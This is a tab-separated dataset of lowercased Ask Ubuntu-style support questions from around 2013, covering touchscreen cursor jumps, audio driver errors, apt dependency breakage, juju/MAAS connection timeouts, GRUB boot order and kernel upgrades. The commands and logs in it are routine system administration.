257910	mouse jumps between using touchscreen and touchpad	i 'm using ubuntu 12.10 64-bit on an asus vivobook x202e for reference . the laptop i got has a touchscreen ( which i 'm liking so far ) . one annoyance i noticed in ubuntu , however , is that switching between using the touch screen vs the mouse causes the cursor to jump . at first i thought it might be remembering the mouse position for each device separately ( e.g . when i touch the screen the cursor moves from point a to b , but then using the touchpad would cause it to return to a first before moving ) but this is not the case . what it actually seems to do is move down and to the right a bit when switching back to the touchpad after touching the screen somewhere . these seems pretty consistent anywhere on the screen . i have n't been able to find any other mention of this . any ideas what might be going on ? edit : for reference , the following is the xinput list output for the pointing devices . the elantech is the touchpad and the maxtouch is the screen . ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ atmel atmel maxtouch digitizer id=10 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=13 [ slave pointer ( 2 ) ]
257913	how to install proc in oracle 11.2g express edition ?	i have installed oracle 11.2g express edition on ubuntu 12.04 64 bit , but inside oracle_home/product/precomp directory there is no proc . how can i install proc to compile embeded sql code . thanks in advance .
257914	how to pick which graphic processor to use ?	i just changed into kubuntu from windows 7 . normally , i would use built-in intel gpu instead of nvidia for normal operations . when using graphical software or games , i would change it into nvidia using context menu . how can i switch between those two cards ? thank you .
257915	increase pointer speed for trackpad in ubuntu 12.04	i am trying make apple trackpad more usable for my needs . so did set the motion-acceleration to 120 and motion-threshold to -500 as suggested here and shown in the image below . the speed of the pointer is still slow so i did some more research and found the mouse speed is a different parameter and known as resolution as explained here . my question how can increase the speed of mouse pointer for trackpad in ubuntu 12.04.01 ?
257923	support for .exe ?	i am somewhat annoyed by the fact that most programs/games/everything else seems to be windows only ( .exe ) . is there something that allows ubuntu to support/run .exe files ? thanks !
257933	ubuntu server : change hostname error	i have an ubuntu 12.04 fresh installation where i want to change the 'hostname ' ( machine name ' . i have followed several instructions , such as from : http : //www.liberiangeek.net/2011/03/change-hostname-computer-name-ubuntu-11-04-natty/ but all of them end with ' can not open display ' problem . basically , i have a gui ( desktop ) installed . i switch to the terminal by ctrl alt f2 key and run commands . what is happening ? am i missing some package ? note , i can do the stat command on /etc/hostname and /etc/hosts files so perhaps permissions are okay ? thanks !
257937	persistent mode on usb has different data between computers	using livelinux usb creator , and this tutorial , i turned a 32gb flash drive into a live ubuntu usb with a 26gb casper-rw partition . this works on the computer that i created the usb with ( kept all my data between sessions ) , but when i boot the usb from other computers it loads different data . all other computers seem to share one set of data , and the original computer seems to have its own set of data . i checked the persistant mode boot options , and they 're exactly the same . this is what the partitions on the usb look like my only guess is that its storing all the other computers data in the 4.7 gb partition , and storing the original computer 's data in the casper-rw partition , but i have no idea . some addition information . i tried the usb on 3 other computers that originally booted either vista , windows 7 , or windows 8 , and use either bios or uefi . none of them made a difference . computer 1 ( the original ) had its own data , and computers 2 , 3 , and 4 all shared a different set of data .
257938	27 inch monitor desktop not full size lg 27ea33v 1920x1080 dpi ?	i just switched to a 27 '' full hd monitor from a 24 '' full hd monitor . however , the kubuntu 12.10 desktop appears with a black border all round . i do not have an xorg.conf and the output of xrandr is : screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 1920 x 1920 dfp1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 598mm x 337mm output of xdpyinfo | grep -b2 resolution : screen # 0 : dimensions : 1920x1080 pixels ( 508x285 millimeters ) resolution : 96x96 dots per inch how can i fix this ? is it to do with dpi ?
257940	12.04 alsa error	my system crashes regularly due to probably the alsa driver . the system suddenly becomes unusable slow , although the music keeps playing . i tried to submit it to the alsa team , but i ca n't get in their bug submitting system ... this is on a hp 8530w with a intel 82801i ( ich9 family ) hd audio feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : snd_pcm_avail ( ) returned a value that is exceptionally large : 404124 bytes ( 2290 ms ) . feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : most likely this is a bug in the alsa driver 'snd_hda_intel ' . please report this issue to the alsa developers . feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : snd_pcm_dump ( ) : feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : hardware pcm card 0 'hda intel ' device 0 subdevice 0 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : its setup is : feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : stream : playback feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : access : mmap_interleaved feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : format : s16_le feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : subformat : std feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : channels : 2 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : rate : 44100 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : exact rate : 44100 ( 44100/1 ) feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : msbits : 16 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : buffer_size : 16384 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : period_size : 8192 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : period_time : 185759 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : tstamp_mode : enable feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : period_step : 1 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : avail_min : 13034 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : period_event : 0 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : start_threshold : -1 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : stop_threshold : 1073741824 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : silence_threshold : 0 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : silence_size : 0 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : boundary : 1073741824 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : appl_ptr : 113727673 feb 18 21:54:11 laptop pulseaudio [ 1980 ] : [ alsa-sink ] alsa-util.c : hw_ptr : 113812320
257942	12.10 : a setting good for both stereo upmix to surround *and* 5.1 ( hdmi )	primarly asking for directions here , since i seem to be able to find either outdated howtos , solutions that send stereo audio to more channels ( and that 's not `` upmix to surround '' ) , or plain 5.1 setups . hardware is a z68 hdmi out , connected to a denon 1301 ht ; in ubuntu sound panel , i 'm using 5.1 hdmi digital out . the denon is able - and already set to - fall back to prologic iix upmix that i 'd be more than happy to use when i 'm playing stereo audio , but under ubuntu ( differently from what happens under windows ) only multichannel audio reaches the amplifier , forfeiting prologic . btw , for some reason , trying to get direct forwarding of ac3/dtc audio to the ht only produces noise ( again , differently from what happens under winslow ) , thus hampering any hope to use dts master audio etc . and making impossible to use a workaround like `` upmix stereo in software , play advanced multichannel thru hardware '' ; but i digress . back to what is happening now : multichannel-only audio from pulse , than . what i 'd like to do is : having some surround upmix of sorts when playing stereo audio having multichannel audio `` right '' when i 'm playing multichannel . not having to manually switch configuration files when moving between upmixed-stereo to multichannel and vice-versa . it 's not clear to me if i can obtain this setting using pulse , or if i have to resort to alsa ( and how ? ) for now , i 'm using smplayer2 with an audio filter string of surround=15 , sub=100:5 , center=4 where the first number is the delay between the front and the rear channels but i't it does n't look like the right thing to do , to me , because : - it is a pain to play multichannel media ( i have to manually remove/restore the filter options , otherwise the audio is horribly crippled down ) - it only works in mplayer2 , and i would like to have some consistency across all the media player software ... . i 'm really lost here . can you point to me to some consistent approach ? what do you suggest ? thanks a lot in advance .
257944	ubuntu livedvd problem	i am new to linux , i tried ubuntu 12.10 . on a laptop pre-loaded with windows 7 , that was later upgraded to windows 8 . i created a live dvd , and booted the disc . when i boot from the disc , it goes through a black screen for a brief moment , and soon after greets me with a purple screen , that has what appears at the bottom as a stick figure guy , and a keyboard with a circle around it . then it goes to a black screen with a flashing underscore . this goes on for minutes , and soon my dvd drive stops running , and the underscore continues to flash , and will not greet me to the setup screen . i currently have quick boot disabled . i know there are problems with the uefi format . i have downloaded , and burned both secure remix 64 bit , along with the traditional 12.10 64 bit . however the trial and error guide for uefi does not describe how to solve my current issue . instead it says when you click try ubuntu it brings a error . this is not my problem , but a reference .
257946	how can i find the driver of syntek webcam for my laptop ?	i have ubuntu 12.04 lts 32 bit on a laptop asus f5rl with a webcam syntek . i ca n't find a driver for this device , .deb or for compiling manually , so this webcam does n't work .
257947	how do i upgrade the kernel ?	i have to upgrade to the new 3.7 kernel from 3.5 on ubuntu 12.10 ( 3.5.0-24-generic kernel default ) while also leaving the previously installed kernels and allow their optional selection during the boot process via grub2 . i 'm not sure where to go from here . i found this : https : //wiki.ubuntu.com/kernel/mainlinebuilds , but am not sure which method / version is right . i also found this one manual kernel upgrade and ubuntu update so am a little worried that i might not install it correctly ( from ubuntuâs perspective ) . also , do i want mainline or something else ? thanks !
257948	how can i get root-like permissions so i can download stuff from the software center ?	when downloading an application from the terminal it said i could n't download it because i was n't root , and when i got to search for the specific software in the ubuntu software center it does n't even come up as a search result . i need to get/download ttf-mscorefonts and preload please .
257953	slow server download	i 'm trying to download the latest lts server . the first time i tried it estimated about 30 minutes which i felt was too long , so i canceled the d/l and restarted . it went up to about 45 minutes . cancelled again , waited about 5 minutes and restarted another d/l . now it wants an hour to do it . what gives ? is ubuntu just that popular or did i trigger some kind of anti-d/l mechanism or am i just lucky , or is there a real problem here ?
257964	completely stuck with apt-get ( nothing will install )	i have been a testing 13.04 the new ubuntu desktop and love it . before now i have only ever had minor errors but today i tried to install the sdk from ubuntu . i followed the 2 steps ( installing from terminal ) and i got the following error : die folgenden pakete haben unerfüllte abhängigkeiten : qtmultimedia5-dev : hängt ab von : libqt5multimediaquick-p5 ( = 5.0.1-0ubuntu1 ) soll aber nicht installiert werden e : unerfüllte abhängigkeiten . versuchen sie »apt-get -f install« ohne angabe eines pakets ( oder geben sie eine lösung an ) . which translates to the following packages have unmet dependencies : qtmultimedia5-dev : depends : libqt5multimediaquick-p5 ( = 5.0.1-0ubuntu1 ) but it should not be installed e : unmet dependencies . try 'apt-get-f install . `` without specifying a package ( or specify a solution ) its in german ( i live in germany but from uk ) but basically its referring to a missing dependency however the dependencies wont install . i tried the following command to fix dependencies : sudo apt-get -f install but got the following : dpkg : fehler beim bearbeiten von /var/cache/apt/archives/libqt5multimediaquick-p5_5.0.1-0ubuntu1_i386.deb ( -- unpack ) : versuch , »/usr/lib/i386-linux-gnu/libqt5multimediaquick_p.so.5.0« zu überschreiben , welches auch in paket libqt5multimediaquick5 5.0.0-0ubuntu1~test2 ist fehler traten auf beim bearbeiten von : /var/cache/apt/archives/libqt5multimediaquick-p5_5.0.1-0ubuntu1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) which translates to dpkg : error processing / var/cache/apt/archives/libqt5multimediaquick-p5_5.0.1-0ubuntu1_i386.deb ( - unpack ) : trying to overwrite '/ usr/lib/i386-linux-gnu/libqt5multimediaquick_p.so.5.0 ' , which is also in package libqt5multimediaquick5 5.0.0-0ubuntu1 ~ test2 errors were encountered while processing : / var/cache/apt/archives/libqt5multimediaquick-p5_5.0.1-0ubuntu1_i386.deb e : sub-process / usr / bin / dpkg returned an error code ( 1 ) ever since . i can not install or remove programs . i have tried also : sudo apt-get clean ( and autoclean ) sudo apt-get -u dist-upgrade sudo dpkg -- configure -a i have even tried the walkthrough on the following page : how do i resolve unmet dependencies ? i still ca n't get it to work ! has anyone a suggestion ? please help me to fix aptitude .
257965	how to fix incorrect arrow issues in metatrader 4 running through wine ?	after installing wine and updating to v1.5.24 , i installed metatrader 4 trading program . but after that i found that the all the arrows in metatrader are drawn in an incorrect way . following screenshot shows the problem in drawing the arrows : how do i solve the issue of incorrect arrows ?
257968	revert back unity	i think i messed up my ubuntu 12.04 . i really just want the 'dodge over window ' feature that 's why i followed the steps here : http : //www.webupd8.org/2013/01/unity-revamped-ppa-is-back-for-ubuntu.html and now i have unity version 5.18 but every time i log in , i 'm just getting a screen with my wallpaper and a mouse . i enabled 'unity plugin ' in ccsm , but did n't work . i tried to uninstall unity and did these : sudo apt-get install ppa-purge sudo ppa-purge ppa : ikarosdev/unity-revamped sudo apt-get update sudo apt-get install unity but still getting version 5.18 . now i 'm thinking the best solution ( i think ? ) is to completely remove unity and all it 's components to get version 5.10 . or if you have a different solution just for me to get back my desktop would be great . thanks for reading .
257971	show unity launcher on with key combination	i wanted to ask if it is possible to pub unity launcher on autohide and have 2 ways of showing it . first is obvious with mouse , and second with some type of key combination , like ctrl+shift . edit : it would be nice i launcher would be shown for only as long as ctrl+shift is pressed . as soon as i remove my fingers launcher should hide .
257972	user session lost device settings or drivers while guest working fine	after turning my computer today , i 've noticed it getting stuck or freeze when i typed the user password . the computer was rebooted and i got the warning that there were erros and i 've pressed f for automatically fix it . i remember seeing something like /home/ mount , having problems to mount . when switching users , to guest it looks everythings working fine . my main account , there 's no sound device , its not listed in the soundsettings , its completely blank the list . is there a way to fix this ? is there a way to understand whats going on ? 12.10 ubuntu
257976	permissions question for lighttpd	ok , i thought i understood linux permissions and users and groups and all that , but i 'm very confused about something . i 've installed lighttpd , and left it 's default dir at /var/www with cgi enabled and pointing to /var/www/cgi-bin/ . i dropped some python files in there and it works . i can browse to the directory via ssh and run them , and i can hit them in my browser and they run also . the weird thing is that i can no longer drop files into the cgi-bin folder via sftp . i assumed it was a permissions error , and when i ran ls -l i get drwxrwxr-x fr the folder . is that why i ca n't ftp files ? my ftp user is not the owner or group for that folder . but then i checked the .py files themselves and got -rw-r -- r -- . so how can these scripts execute ? it looks like no one can run them , but i can run them directly or via lighttpd in a browser . what 's going on here ?
257992	how can i use pulseaudio virtual audio streams to play music over skype ?	i 'm trying to listen to the audio output of a specific process ( a ) and another process ( b ) while redirecting a 's audio output to b 's audio input . this would be the equivalent of playing music into skype while listening to both the music and your friend and having your friend be able to hear you . i have tried following the tutorial on opensuse ( google `` looking ( maybe ) for audio mixer for use with pulse audio '' ) about it and even watched the video several times . i previously tried jack only to find out it wo n't recognize my headset , the logitech g35 . i 'm able to play the music , have both my friend and i hear it but i ca n't send my voice at the same time . it 's either my voice or the music that my friend hears . how can i also send my voice ? some pictures of my setup ( using one null output ) : playback tab : recording tab :
257993	flash videos with steam app ?	i get this messagge instead of the videos in steam 64 bits . you need to have a specific flash player installed to view video content in steam . please follow these directions to get the right version for steam . you will need this flash player even if you already have the latest player for your default web browser . i follow those steps and i open the .deb usc opens and shows me bad comments from other users about that package . i have no trouble with flash videos on firefox and do n't want to get any . should i install that package anyway ?
257998	error while trying to run juju bootstrap	i was following the general how-to-install maas and after my nodes were successfully created , i went further to install juju to make openstack installation easy but then i get the following error : root @ mymaas : /home/user # juju status 2013-02-18 19:52:46,361 info connecting to environment ... unhandled error in deferred : unhandled error traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 545 , in _runcallbacks current.result = callback ( current.result , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/base.py '' , line 250 , in _checktimeout userdeferred.callback ( result ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 362 , in callback self._startruncallbacks ( result ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 458 , in _startruncallbacks self._runcallbacks ( ) -- - < exception caught here > -- - file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 545 , in _runcallbacks current.result = callback ( current.result , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/tcp.py '' , line 369 , in _setrealaddress self.doconnect ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/tcp.py '' , line 395 , in doconnect connectresult = self.socket.connect_ex ( self.realaddress ) file `` /usr/lib/python2.7/socket.py '' , line 224 , in meth return getattr ( self._sock , name ) ( *args ) exceptions.typeerror : an integer is required 2013-02-18 19:53:16,380 error can not connect to environment : unexpected timeouterror interacting with provider : user timeout caused connection failure . traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/juju/providers/common/connect.py '' , line 42 , in run client = yield self._internal_connect ( share ) providerinteractionerror : unexpected timeouterror interacting with provider : user timeout caused connection failure . unexpected timeouterror interacting with provider : user timeout caused connection failure . 2013-02-18 19:53:16,390 error unexpected timeouterror interacting with provider : user timeout caused connection failure . i do n't know where i went wrong in the juju installation but below is what i have in my environment config file . juju : environments environments : maas : type : maas maas-server : 'http : // { my-ip-address } /maas' maas-oauth : ' $ { dxskfbuhn3urhbcdd6 : z9v47vmss2jdbxl4l2:6dqardxcgutz7nvyemhmant2yhnubrr2 } ' admin-secret : 'nothing' default-series : precise please help !
258004	ubuntu-12.10-desktop `` amd64 '' and `` i386 '' .iso	now when i tried to download ubuntu for win7 installer , it gave me an iso with `` amd64 '' in it , assuming that it 's based on the processor , so i decided to check for any other downloads and found `` i386 '' , which i guess its for well , i3 processors , and decided to download it instead since i use i5 , but the question is : what is the difference between those two isos ? and why should i install the amd64 version on my i5 laptop ?
258010	ubuntu 12.04.2 lts boots to purple screen	i have seen some solutions but none of them work for me , so here is the issue ubuntu 12.04 will not boot but instead leaves me with a purple screen with no loading bar i have : an asus motherboard 8 gb ddr3 ram nvidia gtx 560 graphics card intel i7 quad core processor the operating system booted two times before this happened but refuses to boot anymore . i will repeat , no other solutions worked for me , and the failsafex claims that x does not exist .
258011	can avahi zeroconf mdns correctly resolve bare hostnames ?	ubuntu supports resolving machine.local names . how can you configure it correctly to resolve only machine as the hostname ? by default it appears to assume that this is a dns search .
258012	shell script desktop shortcut	so i tried making a desktop shortcut which executes a very simple shell script . but when i double click/right click- > execute it , it does nothing . ( or at least i think it does nothing ) heres how my shortcut and shell script looks : note the shortcut has `` terminal '' set to 1 , and i hope that means that it opens the shell script in a new terminal window.. ( i have a couple terminals already open , which arent ready for usage ( have scripts running ) ) shortcut : [ desktop entry ] version=1.0 type=application name=test comment=test exec=/home/ ( myusername ) /test/test.sh icon=utilities-terminal terminal=true startupnotify=false genericname=test shell script : # ! /bin/sh # ( i tried both , /bin/bash and /bin/sh ) echo `` hi ''
258016	help on setting up a home media server that can also be used outside of home	i received a free computer desk top about a week ago . i really want to find a way to set up some kind of simple and secure way to turn it into a home/personal server . my goals for this project hook the desk top with external hd into my t.v . for a `` personal home theater '' . ( this has been completed ) be able to have the desk top share the external hd with-in a home network , so i could watch a movie or tv show in bed , or somewhere else besides the living room on a laptop , tablet , phone ... whatever ones heart desires . and also be able to ... lets say live on mars , and still be able to view whatever i want from the external hd back on earth , through my laptop on mars . i have already tried quite a few set-ups to no avail ( http : //www.linuxhomeserverguide.com/ ) . not that it did n't suit my needs , but i kept getting lost or stuck . and quite honestly i think its because that guide is just out of date now . but i was following it to the `` t '' , including the ubuntu server versions and package versions , etc . is there a preferred ubuntu server version that would work the best for this kind of thing , and also what type of server would suit my needs/goals best while remaining to be simple and safe ? and lastly do you know of any clean and well thought out guides that would be able to get me to my goals ? thank you very much in advanced - barkerto
258019	ubuntu 12.10 on asus q200e is super slow , how to improve ?	the primary symptom is that apps frequently freeze up , graying out . i 've read that the gray is a visual signal from compiz for apps that have become unresponsive . it happens so often that the machine is basically unusable . every time i interact with an x app , e.g . firefox and software center , they will freeze and go gray . the freeze is system modal : alt-tab does n't work , so i just have to wait it out . the mouse usually moves , but sometimes not . i 'd say 90 % of the time the mouse is movable . i 've come to expect waiting at least 30 seconds per freeze before i can use the machine again , often longer . if i scroll a web page , enter a new url or use a search engine . if i search software center , install an app . xterm is the only exception- it never freezes . heck , i 've left this machine sitting next to my desktop while i do other work , and have noticed firefox will grey out the top window every few minutes ! all on its own , without me even near the machine . top shows that compiz is frequently busy , occupying 40-100 % of a core . i also experimented with disabling opengl in compiz 's config mgr , thinking that maybe this machine does n't have a proper accelerated gpu ( doubtful ) and that it 's emulating the accelerated window mgr features , but found no difference in performance . i 'm about ready to scrap this install , and move to lubuntu , mint or some similar lighter distro , in the hopes this situ will improve . i installed 12.10 onto a kingston 16gb thumb drive , changed the bios boot order , and boot from that . the q200e came with windows 8 on a 500gb hd . i 've run that a few times , and it never lags like this ubuntu installation , but i 've only surfed the web with it . any help appreciated . specs : ubuntu 12.10 64-bit , kernel 2.5.0-17-generic ( uname also says `` ubuntu smp '' ) intel i3 @ 1.4 ghz 4gb ram ( 1.5-2.0 gb in use typically , per top ) 4gb swap ( 0 in use , it 's never been touched ) kingston 16gb drive ; reads at 23 mb/s ; writes at 4 to 5 mb/s ( per dd ) it 's not a super-slow machine , the benchmarks are okay and the bus speed is n't awful ( df if=/dev/zero of=/dev/null bs=1m count=1000 ( 10gb ) 1.55482s , 6.7 gb/s ( for comparison , my i7 desktop runs this in 0.635 secs , about 2.5 times faster ) ) dmesg shows no obvious errors , all cores available , memory good
258023	how to configure the locale to be different from the default locale for a user on ubuntu server ?	on ubuntu server 12.04 , how can i configure an account to use a locale other than the system default local ? say if i wanted russian users to be able to use russian in the terminal ... and polish users to use polish , how can i achieve that ? the default locale is supposed to remain at en_us in its various incarnations ( it defaults to the utf-8 variant ) . the ideal solution would be something where i can set it in adduser and friends , but i did n't find such option . note : no x11 and the question is solely about the terminal .
258027	how to get wifi direct ( wifi p2p ) on my hp dm1 laptop ?	i am an ubuntu newbie . i have a hp dm1 laptop with ralink rt5390 wifi card . it has the ability to connect on wifi direct with my nexus 7 in windows while using latest drivers located at mediatek site . but i am unable to use wifi direct in ubuntu . i found wpa2_supplicant supports this and installed the same , but still wifi direct is not functioning . can anyone help ?
258028	is $ run a built in command to execute ?	i have a .sh script that starts a java service of mine ( i did n't write this ) . can someone explain how this actually executes ? start ( ) { .. .. # setup classpath . $ root/bin/_cp.sh run= '' java -dlog.root= $ var $ jopts $ cp $ main -v '' # start $ run 2 > > $ out_file > > $ out_file & } when start gets called , it builds sets the variables for the options and class path ( java stuff ) , but when does this line do ? $ run 2 > > $ out_file > > $ out_file & is $ run something built in at all ? i want to convert this over to a upstart script , and upstart requires me to use exec like : script [ `` $ enabled '' = `` 1 '' ] || [ `` $ force_start '' = `` 1 '' ] || exit 0 # setup serviio specific properties java_opts= '' -djava.net.preferipv4stack=true -djava.awt.headless=true -dderby.system.home= $ serviio_home/library -dserviio.home= $ serviio_home -xmx512m -xms20m -xx : +useparnewgc -xx : minheapfreeratio=10 -xx : maxheapfreeratio=20 '' # construct classpath cd $ serviio_home classpath= '' config '' for i in lib/*.jar ; do classpath= '' $ classpath : $ i '' done # write to syslog - for debugging # logger -t $ 0 -- `` starting : /usr/bin/java $ java_opts -classpath $ classpath org.serviio.mediaserver '' exec /usr/bin/java $ java_opts -classpath $ classpath org.serviio.mediaserver end script
258032	how to use midi keyboard with seq24	i want to set some midi from a midi keyboard on a loop using a sequencer , and it seems like seq24 would be the simplest way to do this . however , seq24 does n't show up in jack connections , and i do n't know how to connect my keyboard to it . it also does n't play sound when i use the on-screen input ( probably is related to not showing up in jack ) . how do i fix it ? thanks ! if another program is better , i 'd use that too . i have qtractor and rosegarden installed , but i do n't know how to loop things with those programs without copying and pasting..
258033	i installed ubuntu alongside osx and now osx will not start .	i installed ubuntu `` alongside osx lion , '' but now osx refuses to start . i originally intended to use refit to dual boot linux , but that process failed when i downloaded `` alongside '' ubuntu . ubuntu gives me an option at the beginning to start all these different os 's , but only two include osx ( a 32 and a 64 bit version ) . when i click on the 32 bit it does nothing , but when i click on the 64 bit it gives me three beeps and a black screen . what should i do now ? because i checked in ubuntu and all my osx files are still there .
258034	wireless network instability with large file transfers after upgrade to 12.04	i have ubuntu 12.04 running on a pc at home . i use it to store files , manage git repos , and back up my remote servers . everything was running great while i was running ubuntu 11 . now , the connection is stable when i 'm just issuing commands etc . however , after the update any time i try to transfer large files through ssh/sftp the connection times out . this is even when i 'm connecting locally where i 'd typically be able to move very large files very quickly . i 'm not really sure why i 'm seeing this instability i 'm using a linksys wmp600n that works oob . i 'm also not really sure if/how i should be troubleshooting the issue ... should i just be looking for an alternative driver ? any help would be greatly appreciated . edit : i would like to add that the same is true for outgoing connections . i ca n't download from or to my ubuntu box . previously i 'd average 1tb/mo , now i can barely clear 100mb .
258040	usb memory stick shows just a blank page	this is happening presently with all my memory sticks - something to do with ubuntu update or upgrade presently using ubuntu 12.04 ? i worked before but since the last upgrade it does n't show the files
258041	boot running low on space	i got an error message saying `` the volume boot has only 5.3 mb disk space remaining . '' i looked through some of the answers on this site and the closes one i found referred to old linux kernels , but here 's a list of all my kernels . ii linux-image-3.5.0-17-generic 3.5.0-17.28 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-18-generic 3.5.0-18.29 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-19-generic 3.5.0-19.30 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-21-generic 3.5.0-21.32 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-22-generic 3.5.0-22.34 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-23-generic 3.5.0-23.35 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-24-generic 3.5.0-24.37 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-extra-3.5.0-17-generic 3.5.0-17.28 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-extra-3.5.0-18-generic 3.5.0-18.29 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-extra-3.5.0-19-generic 3.5.0-19.30 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-extra-3.5.0-21-generic 3.5.0-21.32 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-extra-3.5.0-22-generic 3.5.0-22.34 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-extra-3.5.0-23-generic 3.5.0-23.35 i386 linux kernel image for version 3.5.0 on 32 bit x86 i do n't think that 's a lot so what do i do ?
258046	creating libraries similar to those in windows	how can i create a windows library style folder in ubuntu ( 12.10 ) to allow items from multiple locations to show up under one folder/view ? i would like to have my `` videos '' folder point to my 2 storage harddrives containing all my tv-shows .
258049	set 2 passwords for one user ?	i need to set 2 passwords for a user , like : one password for normal usage and another one for sudo access . how is this possible ?
258051	unable to handle kernel null pointer dereference at 000000000000001b0	after doing the normal update-manager updates an hour ago on ubuntu 12.10 , i rebooted my computer . everything seemed to be going fine however as soon as the login gui is supposed to appear , the screen just goes ( and stays ) blank/black . the only thing that my computer will respond to is a ctrl+alt+f ( 1-6 ) to switch to any of the text consoles , or ctrl+alt+f7 which displays a rather long error message . the first line of the error message is : bug : unable to handle kernel null pointer dereference at 00000000000000001b0 the really weird thing about it is that , although i can switch between the different terminals , all of my typing only goes to the error output screen ( crtl-alt-f7/tty7 screen ) . this makes it impossible to log in . in other words , i can be looking at the text-login screen and typing , but the typing is directed to the wrong screen/console . ( to be more accurate about my ubuntu version , it is actually , the ubuntu that installs onto a special file within a windows ntfs partition , iirc called wubi installer ) help ? i 'm not sure what to do about this one .
258052	windows and ubuntu : can i have both ?	so this is the first time that i 'm trying out ubuntu to get a tux the penguin plush on tf2 and i 'm scared that i might lose windows 7 , my favorite os . do i get to keep windows after installing ubuntu ? please tell me .
258056	change which linux install `` controls '' grub	i was having some issues i was trying to narrow down so i made a small partition and threw fedora on it . well , i was n't paying attention and fedora 's grub is now `` in control '' so to speak . if i want to edit grub 's menu , i have to do it in fedora ( any changes made in ubuntu wo n't register ) basically , today , i wiped my ubuntu partition , formatted it , split off 15gb , reinstalled xubuntu from the live cd , then installed fedora immediately after on the 15gb partition , which overwrote xubunutu 's grub . how can i flip it back so ubuntu is in control of grub , rather than fedora , preferably without reformatting and reinstalling again ( i just finally got everything set back up ) or do they both control it and i just missed something ? i changed the boot order in ubuntu ( along with which was the default ) but it did n't take , using grub customizer .
258057	installed application as root , unable to use by other user	i have installed a program as per the read-me file available with the same , i.e . -- how to install -- -- -- -- -- -- -- -- -- -- -- * you need login as root * 1 . run `` tar jxvf linux_install.tar.bz2 '' 2 . run `` ./install '' in terminal to install mobilepartner eg : # bash / < path > /install 3 . if you had installed this software in your system before , you will get a prompt : `` the software is exist , do you want overwrites ? ( [ y ] / [ n ] ) '' , enter `` y '' to overwrites or `` n '' to exit . 4 . if you do not had installed this software in your system before , you will get a prompt : `` please input the install path [ /usr/local/mobile_partner ] : '' . then you can input install path ( fullpath ) , or you may using the default path ( /usr/local/mobile_partner ) by press enter direct 5 . finish installing -- how to run -- -- -- -- -- -- -- -- -- -- -- -- -- * from shortcut in desktop * run mobilepartner in your install path eg : # / < install path > /mobilepartner * plug in your device , it will run automatically ( not supported in xandros ) so the desktop shortcut is on the home folder ( desktop ) of root user . now my question is when i will login as a normal user ( not as root ) , how can i access this application .
